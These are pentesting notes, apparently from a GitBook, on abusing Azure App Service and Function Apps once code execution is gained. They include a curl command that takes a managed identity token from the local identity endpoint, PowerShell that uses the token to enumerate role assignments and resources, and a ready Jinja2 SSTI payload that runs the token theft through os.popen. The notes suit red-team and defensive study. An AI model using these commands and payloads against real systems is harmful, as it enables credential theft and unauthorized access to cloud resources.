# Azure App Service

Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

<figure><img src="/files/OkKkg1bo08RfLcgJYTCH" alt=""><figcaption></figcaption></figure>

### Isolation

{% hint style="info" %}
Each app runs inside a sandbox but isolation depends upon App Service plans
{% endhint %}

* Apps in the Free and Shared tiers run on shared VMs
* Apps in the Standard and Premium tiers run on dedicated VMs

### App Service Abuse

While App Service ships with default security features (sandboxing/isolation), vulnerabilities in the deployed code are still abusable. The classic web app vulns like SQL injection, OS command injection, etc. do not disappear.

### Managed Identity

If a vulnerability in an app service is abused to get command execution, the privileges obtained are those of the low-privilege worker process. But if the app service uses a Managed Identity, that identity may hold interesting permissions on other Azure resources.

<figure><img src="/files/VO2MBfR5JD1AOzBFs99C" alt=""><figcaption></figcaption></figure>

Once you have command execution, run `env` to check if the `IDENTITY_HEADER` and `IDENTITY_ENDPOINT` variables are set. If they are, the app has a managed identity.

<figure><img src="/files/Uz2JH4U6CBIVno6mjrOA" alt=""><figcaption></figcaption></figure>

Now, to get an access\_token for the app service, we can use the following command:

{% code lineNumbers="true" %}

```bash
# Ask the local identity endpoint for a token scoped to Azure Resource Manager
# (api-version 2017-09-01); the secret header is only known inside the app's sandbox.
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" \
     -H "secret:$IDENTITY_HEADER"
```

{% endcode %}

<figure><img src="/files/T22FHVWqfTVuhtK9bik0" alt=""><figcaption></figcaption></figure>
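As an added example (not part of the original notes), a small Python helper that parses the JSON the identity endpoint returns and decodes the token's claims, so you can see which identity the token belongs to (tenant, app id, object id) and how long it remains valid. The response shape follows the 2017-09-01 API shown above; every GUID and resource path in the sample is a constructed placeholder.

```python
import base64
import json
import time
from typing import Optional


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def jwt_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT WITHOUT verifying its signature.
    Good enough for inspecting a token you already hold; never use it for auth decisions."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    return json.loads(b64url_decode(parts[1]))


def summarize_msi_token(response_json: str, now: Optional[float] = None) -> dict:
    """Summarize the identity endpoint's JSON response: audience, lifetime, identity."""
    body = json.loads(response_json)
    claims = jwt_claims(body["access_token"])
    now = time.time() if now is None else now
    return {
        "resource": body["resource"],              # audience requested via ?resource=
        "token_type": body["token_type"],
        "seconds_left": int(body["expires_on"]) - int(now),
        "tenant": claims.get("tid"),
        "app_id": claims.get("appid"),             # service principal behind the identity
        "object_id": claims.get("oid"),            # usable with Get-AzRoleAssignment -ObjectId
        "identity_resource": claims.get("xms_mirid"),  # ARM id of the app, when present
    }


def _fake_jwt(claims: dict) -> str:
    """Build an UNSIGNED token carrying the given claims, for offline testing only."""
    enc = lambda obj: base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# Constructed sample response; GUIDs and the resource path are placeholders.
SAMPLE_RESPONSE = json.dumps({
    "access_token": _fake_jwt({
        "tid": "00000000-0000-0000-0000-00000000000a",
        "appid": "00000000-0000-0000-0000-00000000000b",
        "oid": "00000000-0000-0000-0000-00000000000c",
        "xms_mirid": "/subscriptions/<sub-id>/resourcegroups/<rg>/providers/Microsoft.Web/sites/<app-name>",
    }),
    "expires_on": "1700003600",
    "resource": "https://management.azure.com/",
    "token_type": "Bearer",
})

if __name__ == "__main__":
    print(json.dumps(summarize_msi_token(SAMPLE_RESPONSE), indent=2))
```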

### Check App Privileges

Once you have an access\_token for the app service, use it to authenticate with Az PowerShell (`Connect-AzAccount`):

```powershell
# $token holds the access_token value returned by the identity endpoint
Connect-AzAccount -AccessToken $token -AccountId 064aaf57-30af-41f0-840a-xxxxx
```

Now, to check which role assignments our token has, run:

```powershell
Get-AzRoleAssignment
```

To list the resources available to it, run:

```powershell
Get-AzResource
```

### SSTI payload

If you find an app vulnerable to SSTI (Jinja2), use this payload to get the app's access\_token:

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

### Function App

A function app (also called Azure Functions) is Azure's 'serverless' solution to run code. A function app is meant to react to an event, such as:

* An HTTP trigger
* Processing a file upload
* Running code on a schedule, and more

Function apps also support managed identities!

{% hint style="info" %}
It looks a lot like AWS Lambda
{% endhint %}

When you get the following error, it means the access\_token has no access to any resources:

<figure><img src="/files/Sjx1DFzaTgGDU1aivjjo" alt=""><figcaption></figcaption></figure>

{% hint style="warning" %}
By default, managed identities (service principals), have no read access at all!
{% endhint %}

In this case, something like AzureHound comes in handy.
